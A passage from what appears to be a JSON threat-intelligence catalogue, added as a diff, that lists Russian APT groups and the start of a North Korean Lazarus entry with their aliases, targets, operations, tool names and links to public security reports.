"https://www.welivesecurity.com/2018/09/27/lojax-first-uefi-rootkit-found-wild-courtesy-sednit-group/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/update-pawn-storm-new-targets-politically-motivated-campaigns/", + "http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html", + "https://securelist.com/a-slice-of-2017-sofacy-activity/83930/", + "http://www.welivesecurity.com/2016/10/20/new-eset-research-paper-puts-sednit-under-the-microscope/", + "https://www.bloomberg.com/news/articles/2022-03-07/hackers-targeted-u-s-lng-producers-in-run-up-to-war-in-ukraine?sref=ExbtjcSG", + "http://researchcenter.paloaltonetworks.com/2016/06/unit42-new-sofacy-attacks-against-us-government-agency/", + "https://cybergeeks.tech/skinnyboy-apt28/", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "https://securelist.com/masha-and-these-bears/84311/", + "https://app.box.com/s/g55oxdd3q63hyngbjm4fbipfct94wrye", + "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf", + "https://www2.fireeye.com/rs/848-DID-242/images/wp-mandiant-matryoshka-mining.pdf", + "https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296.pdf", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/prime-ministers-office-compromised.html", + "http://fancybear.net/", + "http://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/", + "https://www.us-cert.gov/sites/default/files/publications/AR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdf", + "https://cdn.area1security.com/reports/Area-1-Security-PhishingBarismaHoldings.pdf", + "https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/" + ], + "attck_id": null, + "comment": "Called out by DHS & FBI as responsible for cyber attacks associated with US election 2016.Allegedly attributed the first UEFI rootkit seen in the wild: LoJax (2018), Overlaps with Zebrocy" + }, + { + "country": "russia", + "names": [ + "EuroAPT", + "APT29", + "Hammer Toss", + "Fritillary", + "Cozy Duke", + "SeaDuke", + "Minidionis", + "CozyCar", + "Cozer", + "Dukes", + "Cozy Bear", + "Yttrium / StellarParticle", + "Office Monkeys / TEMP.Monkeys", + "IRON HEMLOCK", + "Group 100" + ], + "targets": [ + "This threat actor targets government ministries and agencies in Europe, the US, Central Asia, East Africa, and the Middle East, associated with DNC attacks" + ], + "operations": [ + "Operation Ghost" + ], + "description": "phishing emails", + "tools": [ + "AdobeARM", + "CozyDuke", + "Grizzly Steppe", + "SeaDuke", + "MiniDionis", + "POSHSPY", + "RegDuke", + "FatDuke", + "PolyglotDuke", + "Tadpole", + "SeaDaddy implant developed in Python and compiled with py2exe", + "ATI-Agent", + "Spikerush", + "CosmicDuke", + "Vernaldrop", + "MiniDuke", + "OnionDuke", + "Hammertoss" + ], + "links": [ + "https://securelist.com/the-cozyduke-apt/69731/", + "https://aptnotes.malwareconfig.com/web/viewer.html?file=../APTnotes/2015/apt29-hammertoss-stealthy-tactics-define-a.pdf", + "https://www.welivesecurity.com/2019/10/17/operation-ghost-dukes-never-left/", + "https://labsblog.f-secure.com/2015/09/17/the-dukes-7-years-of-russian-cyber-espionage/", + "https://www.us-cert.gov/sites/default/files/publications/AR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdf", + "https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/", + "https://www.istrosec.com/blog/apt-sk-cobalt/", + "https://cybergeeks.tech/how-to-defeat-the-russian-dukes-a-step-by-step-analysis-of-miniduke-used-by-apt29-cozy-bear/", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "http://www.volexity.com/blog/", + "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf", + "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", + "https://www2.fireeye.com/rs/848-DID-242/images/RPT-M-Trends-2017.pdf" + ], + "attck_id": null, + "comment": "Active campaign post 2016 US presidential election" + }, + { + "country": "russia", + "names": [ + "Group 88", + "Turla Team", + "Uroburos", + "IRON HUNTER", + "Waterbug", + "Snake", + "ITG12", + "Turla Group ", + "MAKERSMARK", + "SIG23", + "Krypton", + "Venomous Bear" + ], + "targets": [ + "Targeting several governments and sensitive businesses such as the defense industry" + ], + "operations": [ + "Epic Turla", + "Witchcoven", + "Satellite Turla", + "Mosquito", + "The 'Penquin' Turla", + "RUAG hack", + "Moonlight Maze" + ], + "description": null, + "tools": [ + "AdobeARM", + "WhiteBear", + "tasklist", + "wce", + "ATI-Agent", + "Tavdig", + "Wipbot", + "Uroburos", + "Neuron", + "Nautilus", + "systeminfo", + "Turla", + "pwdump", + "net", + "gpresult", + "Agent.BTZ", + "MiniDionis", + "Gazer", + "Agent.dne" + ], + "links": [ + "https://medium.com/chronicle-blog/who-is-gossipgirl-3b4170f846c0", + "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case", + "https://securelist.com/blog/research/67962/the-penquin-turla-2/", + "https://blog.google/threat-analysis-group/update-on-cyber-activity-in-eastern-europe/", + "https://www.ncsc.gov.uk/news/turla-group-exploits-iran-apt-to-expand-coverage-of-victims", + "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180251/Penquins_Moonlit_Maze_PDF_eng.pdf", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-witchcoven.pdf", + "https://securelist.com/blog/research/72081/satellite-turla-apt-command-and-control-in-the-sky/", + "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/", + "http://www.sueddeutsche.de/digital/it-sicherheit-einbrechen-ausbreiten-abgreifen-1.3887843", + "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/", + "https://www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments", + "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/", + "https://www.ncsc.gov.uk/alerts/turla-group-malware", + "https://blog.sekoia.io/turla-new-phishing-campaign-eastern-europe/", + "https://cybergeeks.tech/a-step-by-step-analysis-of-the-russian-apt-turla-backdoor-called-tinyturla/", + "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/", + "https://securelist.com/turla-renews-its-arsenal-with-topinambour/91687/", + "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/", + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-march-venomous-bear/", + "https://securelist.com/kopiluwak-a-new-javascript-payload-from-turla/77429/", + "https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopiluwak-javascript-backdoor-use-g20-themed-attack", + "https://twitter.com/lehtior2/status/893085897226412036", + "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", + "https://www.wired.com/2017/04/russian-hackers-used-backdoor-two-decades/", + "https://motherboard.vice.com/en_us/article/vvk83b/moonlight-maze-turla-link" + ], + "attck_id": null, + "comment": "Turla also uses OilRig's (APT34) implants " + }, + { + "country": "russia", + "names": [ + "Havex", + "Fertger", + "IRON LIBERTY", + "Dymalloy", + "TEMP.Isotope", + "Dragonfly", + "ALLANITE", + "Crouching Yeti", + "Berserk Bear", + "Energetic Bear", + "Group 24", + "Anger Bear", + "Koala Team", + "PEACEPIPE" + ], + "targets": [ + "This threat actor targets companies in the education, energy, construction, information technology, and pharmaceutical sectors for the purposes of espionage. It uses malware tailored to target industrial control systems. Energy, Middle East oil and natural gas as the goal, dedicated to gather relevant information, technology company in Western Europe that produces civil, military and critical infrastructure communications equipment" + ], + "operations": [], + "description": "Active", + "tools": [ + "Impacket", + "LightsOut ExploitKit", + "Inveigh", + "PsExec", + "Nmap", + "SMBTrap", + "Persistence through .LNK file manipulations", + "Havex RAT", + "Dirsearch", + "MCMD", + "Wpscan", + "Subbrute", + "Oldrea", + "Sqlmap", + "Sublist3r", + "Commix", + "PHPMailer", + "Web Shells (PHP)" + ], + "links": [ + "https://us-cert.cisa.gov/ncas/alerts/aa20-296a", + "https://insights.sei.cmu.edu/cert/2019/03/api-hashing-tool-imagine-that.html", + "https://www.secureworks.com/research/mcmd-malware-analysis", + "http://www.netresec.com/?page=Blog&month=2014-10&post=Full-Disclosure-of-Havex-Trojans", + "https://threatmatrix.cylance.com/en_us/home/energetic-dragonfly-dymalloy-bear-2-0.html", + "https://www.fireeye.com/content/dam/fireeye-www/company/events/infosec/threat-landscape-overview-fireeye-summit-paris.pdf", + "https://threatpost.com/energy-watering-hole-attack-used-lightsout-exploit-kit/104772/", + "https://securelist.com/energetic-bear-crouching-yeti/85345/", + "https://vblocalhost.com/uploads/VB2021-Slowik.pdf", + "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector", + "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group", + "https://securelist.com/blog/incidents/35520/the-teamspy-crew-attacks-abusing-teamviewer-for-cyberespionage-8/", + "https://www.secureworks.com/blog/own-the-router-own-the-traffic", + "https://theintercept.com/2020/12/17/russia-hack-austin-texas/", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf" + ], + "attck_id": null, + "comment": "Detected in Middle East networks in 2014, Compromise via spear phish or SWC, Motivation somewhat unclear; CrowdStrike lists Berserk Bear as separate group (evolution of Energetic) while Symantec sees Energetic Bear and Berserk Bear as single group named Dragonfly" + }, + { + "country": "russia", + "names": [ + "Iron Viking", + "Hades", + "Iridium", + "Quedagh Group", + "Grey Energy", + "BE2 APT", + "Quedagh", + "Electrum", + "TEMP.Noble", + "Sandworm", + "IRON VIKING", + "TeleBots", + "Black Energy", + "Voodoo Bear", + "Sandworm Team (MITRE G0034)" + ], + "targets": [ + "This threat actor targets industrial control systems, using a tool called Black Energy, associated with electricity and power generation for espionage, denial of service, and data destruction purposes. Ukrainian energy sector, Eastern Europe. " + ], + "operations": [ + "Ukrenergo", + "Black Energy", + "NPetya, NotPetya", + "Ukraine Power Grid 2016-12-17" + ], + "description": null, + "tools": [ + "Zekapab", + "GCat", + "OlympicDestroyer", + "Delphocy", + "Zebrocy", + "GreyEngergy Mini as their 1st-stage implant", + "Industroyer", + "CVE-2014-4114", + "CrashOverride" + ], + "links": [ + "https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/", + "https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf", + "https://cert.gov.ua/article/39518", + "https://securelist.com/olympic-destroyer-is-still-alive/86169/", + "http://www.isightpartners.com/2016/01/ukraine-and-sandworm-team/", + "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/", + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/", + "https://ics.sans.org/blog/2016/01/09/confirmation-of-a-coordinated-attack-on-the-ukrainian-power-grid", + "https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/", + "https://dragos.com/wp-content/uploads/CRASHOVERRIDE.pdf", + "https://securelist.com/from-blackenergy-to-expetr/78937/", + "https://www.state.gov/rewards-for-justice-reward-offer-for-information-on-russian-military-intelligence-officers-conducting-malicious-activity-against-u-s-critical-infrastructure/", + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "http://www.isightpartners.com/2014/10/cve-2014-4114/", + "https://www.domaintools.com/resources/blog/centreon-to-exim-and-back-on-the-trail-of-sandworm", + "https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector", + "https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/", + "https://www.us-cert.gov/ncas/alerts/TA17-163A", + "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/", + "https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/", + "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + ], + "attck_id": null, + "comment": "Linked to Kiev Dec2016 ICS cyberattack" + }, + { + "country": "russia", + "names": [ + "Carbanak", + "Anunak", + "FIN7", + "Carbon Spider" + ], + "targets": [ + "Bank of Valetta, Malta" + ], + "operations": [], + "description": null, + "tools": [ + "PowerSource" + ], + "links": [ + "https://www.rsa.com/content/dam/en/white-paper/the-carbanak-fin7-syndicate.pdf", + "https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/", + "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor", + "https://www.fortinet.com/blog/threat-research/bioload-fin7-boostwrite-lost-twin.html", + "https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-techniques.html", + "https://www.esentire.com/security-advisories/notorious-cybercrime-gang-fin7-lands-malware-in-law-firm-using-fake-legal-complaint-against-jack-daniels-owner-brown-forman-inc", + "https://www.rsa.com/content/dam/premium/en/white-paper/the-shadows-of-ghosts-carbanak-report.pdf", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/would-you-exchange-your-security-for-a-gift-card/", + "https://blog.morphisec.com/the-evolution-of-the-fin7-jssloader", + "https://blog.malwarebytes.com/threat-analysis/2019/10/the-forgotten-domain-exploring-a-link-between-magecart-group-5-and-the-carbanak-apt/", + "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/", + "https://securityaffairs.co/wordpress/64083/apt/fin7-new-techniques.html", + "https://blog.cyber4sight.com/2017/04/similarities-between-carbanak-and-fin7-malware-suggest-actors-are-closely-related/", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", + "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns" + ], + "attck_id": null, + "comment": "Overlaps with Carbanak (but not the same group)" + }, + { + "country": "russia", + "names": [ + "FIN8" + ], + "targets": [ + "Hotel-Entertainment Industry, POS malware attack" + ], + "operations": [], + "description": null, + "tools": [ + "PUNCHTRACK", + "PoSlurp", + "ShellTea", + "PUNCHBUGGY", + "PowerSniff", + "BADHATCH" + ], + "links": [ + "https://businessinsights.bitdefender.com/deep-dive-into-a-fin8-attack-a-forensic-investigation", + "https://unit42.paloaltonetworks.com/powersniff-malware-used-in-macro-based-attacks/", + "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html", + "https://atr-blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-at-fin8s-tooling/", + "https://www.bitdefender.com/files/News/CaseStudies/study/394/Bitdefender-PR-Whitepaper-BADHATCH-creat5237-en-EN.pdf", + "http://blog.morphisec.com/security-alert-fin8-is-back", + "https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html", + "https://www.root9b.com/sites/default/files/whitepapers/PoS%20Malware%20ShellTea%20PoSlurp_YARA.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "russia", + "names": [ + "Inception Framework", + "Blue Odin" + ], + "targets": [ + "This threat actor targets governments and diplomatic organizations for espionage purposes. Suspected Operator in Ukraine working for Russia or its allies." + ], + "operations": [ + "Red October", + "Cloud Atlas" + ], + "description": null, + "tools": [], + "links": [ + "https://securelist.com/recent-cloud-atlas-activity/92016/", + "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/", + "http://securelist.com/blog/research/68083/cloud-atlas-redoctober-apt-is-back-in-style/", + "https://www.bluecoat.com/security-blog/2014-12-09/blue-coat-exposes-%E2%80%9C-inception-framework%E2%80%9D-very-sophisticated-layered-malware", + "https://securelist.com/blog/incidents/57647/the-red-october-campaign/", + "https://www.symantec.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies" + ], + "attck_id": null, + "comment": null + }, + { + "country": "russia", + "names": [ + "SIG39", + "TeamSpy Crew" + ], + "targets": [ + "This threat actor primarily compromises government entities and human rights activists in Eastern Europe and Central Asia for espionage purposes. It has also compromised private and public sector entities in the Middle East and in Western countries." + ], + "operations": [ + "TeamSpy" + ], + "description": null, + "tools": [ + "JAVA RATs", + "Malicious TeamViewer versions" + ], + "links": [ + "https://blog.crysys.hu/2018/03/territorial-dispute-nsas-perspective-on-apt-landscape/", + "http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/theteamspystory_final_t2.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "russia", + "names": [ + "Ratopak", + "BuhTrap" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Mimikatz", + "LURK", + "CVE-2012-0158", + "AmmyAdmin", + "NSIS", + "PuntoSwitcher (like Keylogger)" + ], + "links": [ + "https://www.netscout.com/blog/asert/diving-buhtrap-banking-trojan-activity", + "https://www.welivesecurity.com/2019/07/11/buhtrap-zero-day-espionage-campaigns/", + "https://www.welivesecurity.com/2015/04/09/operation-buhtrap/", + "http://www.welivesecurity.com/2015/11/11/operation-buhtrap-malware-distributed-via-ammyy-com/", + "http://www.group-ib.com/brochures/gib-buhtrap-report.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "russia", + "names": [ + "Carberb" + ], + "targets": [ + "USA" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://itlaw.wikia.com/wiki/Moonlight_Maze" + ], + "attck_id": null, + "comment": null + }, + { + "country": "russia", + "names": [ + "???" + ], + "targets": [ + "Swiss defence department" + ], + "operations": [ + "RUAG Espionage" + ], + "description": null, + "tools": [ + "Mimikatz", + "dsget", + "Tavdig/Wipbot/Epic", + "dsquery", + "Snake (Carbon) Rootkit", + "Uroburos", + "Turla Family" + ], + "links": [ + "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case" + ], + "attck_id": null, + "comment": null + }, + { + "country": "russia", + "names": [ + "Primitive Bear", + "BlueAlpha", + "Gamaredon Group", + "FSB 16th & 18th Centers", + "Shuckworm", + "ACTINIUM" + ], + "targets": [], + "operations": [ + "OP Armageddon", + "Op Gamework" + ], + "description": null, + "tools": [ + "DessertDown", + "QuietSieve", + "Pterodo", + "DinoTrain" + ], + "links": [ + "https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/", + "https://cert.gov.ua/article/39386", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-intense-campaign-ukraine", + "https://blog.yoroi.company/research/the-russian-shadow-in-eastern-europe-ukrainian-mod-campaign/", + "https://www.anomali.com/blog/primitive-bear-gamaredon-targets-ukraine-with-timely-themes", + "https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine", + "https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/#indicators-of-compromise", + "http://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/", + "https://mp.weixin.qq.com/s/OfDTcrTVAgjACeh0Z5wi7w", + "https://www.recordedfuture.com/bluealpha-iranian-apts/", + "https://lookingglasscyber.com/wp-content/uploads/2015/08/Operation_Armageddon_FINAL.pdf" + ], + "attck_id": null, + "comment": "Hijack infrastructure of Iranian APT33, APT35 & Muddywater, overlap to Callisto" + }, + { + "country": "russia", + "names": [ + "Cyber Berkut" + ], + "targets": [ + "Bellingcat" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.threatconnect.com/blog/russia-hacks-bellingcat-mh17-investigation/#.V-wnrubaeEU.twitter" + ], + "attck_id": null, + "comment": "During Ukrainian Revolution" + }, + { + "country": "russia", + "names": [ + "WhiteBear", + "Skipper Turla" + ], + "targets": [ + "embassies and diplomatic/foreign affair organizations, defense-related organizations" + ], + "operations": [], + "description": null, + "tools": [ + "Kopiluwak" + ], + "links": [ + "https://securelist.com/introducing-whitebear/81638/" + ], + "attck_id": null, + "comment": "Associated with Turla" + }, + { + "country": "russia", + "names": [ + "???" + ], + "targets": [ + "This threat actor targets critical infrastructure entities in the oil and gas sector, primarily in Ukraine. The threat actors deploy the BugDrop malware to remotely access the microphones in their targets' computers to eavesdrop on conversations." + ], + "operations": [ + "BugDrop" + ], + "description": null, + "tools": [], + "links": [ + "https://cyberx-labs.com/en/blog/operation-bugdrop-cyberx-discovers-large-scale-cyber-reconnaissance-operation/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "russia", + "names": [ + "GRU GTsST (Main Center for Special Technology)" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "NotPetya" + ], + "links": [ + "https://www.washingtonpost.com/world/national-security/russian-military-was-behind-notpetya-cyberattack-in-ukraine-cia-concludes/2018/01/12/048d8506-f7ca-11e7-b34a-b85626af34ef_story.html?utm_term=.23e3c7810049" + ], + "attck_id": null, + "comment": null + }, + { + "country": "russia", + "names": [ + "Triton", + "TEMP.Veles", + "Xenotime" + ], + "targets": [ + "Oil refinery, other infrastructure" + ], + "operations": [], + "description": null, + "tools": [ + "Triton" + ], + "links": [ + "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "https://www.fireeye.com/blog/threat-research/2018/06/totally-tubular-treatise-on-triton-and-tristation.html", + "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html", + "https://dragos.com/wp-content/uploads/NA-EL-Threat-Perspective-2019.pdf", + "https://dragos.com/resource/trisis-analyzing-safety-system-targeting-malware/", + "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html", + "https://dragos.com/resource/xenotime/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "russia", + "names": [ + "Zebrocy" + ], + "targets": [ + "Germany, Indonesia, the United States, Taiwan, India, France, Serbia, Ecuador, Argentina, South Korea, Japan, China, Britain, South Africa, Italy, Hong Kong, Romania, Ukraine, Macedonia, Russia, Switzerland, Senegal, the Philippines, UAE, Qatar, Saudi Arabia, Pakistan, Thailand, Bahrain, Turkey, Bulgaria, Bangladesh" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/", + "https://unit42.paloaltonetworks.com/dear-joohn-sofacy-groups-global-campaign/", + "https://securelist.com/zebrocys-multilanguage-malware-salad/90680/", + "https://securelist.com/a-zebrocy-go-downloader/89419/", + "https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "russia", + "names": [ + "SectorJ04" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Dridex", + "Locky", + "FlawedAmmyy", + "GraceWire malicious software signed with valid digital signatures", + "The Trick", + "Jaff" + ], + "links": [ + "https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/", + "https://www.mcafee.com/enterprise/en-us/threat-center/threat-landscape-dashboard/campaigns-details.operation-sectorj04-2019.html", + "https://www.bankinfosecurity.com/ta505-apt-group-returns-new-techniques-report-a-13678", + "https://www.databreachtoday.com/two-russians-indicted-over-100m-dridex-malware-thefts-a-13473" + ], + "attck_id": null, + "comment": "TTP indicates possibly TA505 Microsoft Security Intelligence and McAfee Teams have affiliated TA505 with SectorJ04 aka Evil Corp aka Dudear since 2014 - reference in Link2 Department of Justice issues warrant for arrest of Dridex member, whom is working for Russian FSB since 2017" + }, + { + "country": "russia", + "names": [ + "FullofDeep" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "QNAPCrypt ransomware" + ], + "links": [ + "https://www.intezer.com/blog-russian-cybercrime-group-fullofdeep-behind-qnapcrypt-ransomware-campaigns/" + ], + "attck_id": null, + "comment": "Operates from Union State & Ukraine" + }, + { + "country": "russia", + "names": [ + "RedCurl" + ], + "targets": [ + "Russia, ukraine, Canada, Germany, the united Kingdom, norway, mainly targeting sectors: construction companies, financial and consulting companies, retailers, banks, insurance companies, law firms, travel agencies" + ], + "operations": [], + "description": null, + "tools": [ + "Powershell scripts" + ], + "links": [ + "https://www.group-ib.com/media/red-curl/" + ], + "attck_id": null, + "comment": "Corporate espionage and theft of documents" + }, + { + "country": "russia", + "names": [ + "Shathak", + "TA551" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Sliver", + "IcedID", + "Valak" + ], + "links": [ + "https://www.proofpoint.com/us/blog/security-briefs/ta551-uses-sliver-red-team-tool-new-activity", + "https://isc.sans.edu/diary/rss/26438", + "https://isc.sans.edu/forums/diary/More+TA551+Shathak+Word+docs+push+IcedID+Bokbot/26674", + "https://threatresearch.ext.hp.com/detecting-ta551-domains/", + "https://unit42.paloaltonetworks.com/ta551-shathak-icedid/", + "https://unit42.paloaltonetworks.com/valak-evolution/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "russia", + "names": [ + "StellarParticle", + "UNC2452", + "Dark Halo", + "NOBELIUM", + "Silver Fish" + ], + "targets": [ + "IT sector" + ], + "operations": [ + "Solarwinds Supply Chain Attack", + "FireEye Compromise" + ], + "description": null, + "tools": [ + "TEARDROP", + "CobaltStrike", + "SUNBURST", + "SUPERNOVA Webshell (likely by other unknown group)", + "COSMICGALE PowerShell Tool" + ], + "links": [ + "https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/", + "https://blogs.microsoft.com/on-the-issues/2021/05/27/nobelium-cyberattack-nativezone-solarwinds/", + "https://malpedia.caad.fkie.fraunhofer.de/actor/unc2452", + "https://blog.reversinglabs.com/blog/sunburst-the-next-level-of-stealth", + "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", + "https://github.com/center-for-threat-informed-defense/public-resources/tree/master/solorigate", + "https://www.riskiq.com/blog/external-threat-management/solarwinds-c2-servers-new-tactics/", + "https://github.com/eanmeyer/SolarwindsVulnerablityInfo", + "https://us-cert.cisa.gov/ncas/alerts/aa20-352a", + "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", + "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/", + "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", + "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf", + "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html" + ], + "attck_id": null, + "comment": "High sophistication" + }, + { + "country": "russia", + "names": [ + "Lorec53", + "Saint Bear", + "Ember Bear", + "TA471", + "Lorec Bear", + "UAC-0056", + "UNC2589", + "Bleeding Bear" + ], + "targets": [ + "Ukraine" + ], + "operations": [], + "description": null, + "tools": [ + "WhisperGate wiper", + "Elephant Framework" + ], + "links": [ + "https://socprime.com/blog/cobalt-strike-beacon-grimplant-and-graphsteel-malware-massively-spread-by-uac-0056-threat-actors-in-targeted-phishing-emails-cert-ua-alert/", + "https://cert.gov.ua/article/37704", + "https://www.intezer.com/blog/research/elephant-malware-targeting-ukrainian-orgs/", + "https://www.crowdstrike.com/blog/who-is-ember-bear/", + "https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "russia", + "names": [ + "COLDRIVER", + "Callisto" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://blog.google/threat-analysis-group/tracking-cyber-activity-eastern-europe/", + "https://blog.google/threat-analysis-group/update-on-cyber-activity-in-eastern-europe/", + "https://natoassociation.ca/phishing-on-the-dnieper-russian-offensive-cyber-operations-in-ukraine/", + "https://www.f-secure.com/documents/996508/1030745/callisto-group" + ], + "attck_id": null, + "comment": "Overlap w/Gamaredon" + }, + { + "country": "north_korea", + "names": [ + "NewRomanic Cyber Army Team", + "ZINC", + "Lazarus Group", + "Nickel Academy", + "Labyrinth Chollima", + "Hidden Cobra", + "Unit 121", + "Bureau 121", + "Whois Hacking Team", + "Appleworm" + ], + "targets": [ + "Believed to be responsible for Dark Seoul, Ten Days of Rain, the Sony Pictures Entertainment attack,\u00c2\u00a0the SWIFT-related bank heists, and WannaCry. Known to the U.S. government as Hidden Cobra. Targeting also BitCoin Exchanges, financial sector, technology/engineering sector" + ], + "operations": [ + "Dream Job", + "ThreatNeedle", + "Applejeus", + "Blockbuster", + "Dark Seoul", + "KuCoin Hack", + "NorthStar", + "Inception" + ], + "description": "Delivery: usually via spear phishing email.Infrastructure: C2 often based on compromised servers,moving to own servers paid by bitcoin to preserve anonymityPersistency: tipically launching ransomware after operation to destroy evidences", + "tools": [ + "FallChill RAT", + "ThreatNeedle", + "Troy", + "Tdrop", + "WolfRAT", + "Destover", + "SheepRAT", + "Manuscrypt", + "HtDnDownLoader", + "Tdrop2", + "Volgmer", + "Hawup" + ], + "links": [ + "https://www.cisa.gov/uscert/ncas/alerts/aa22-108a", + " https://securelist.com/operation-applejeus/87553/", + "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", + "https://www.us-cert.gov/ncas/alerts/TA17-164A", + 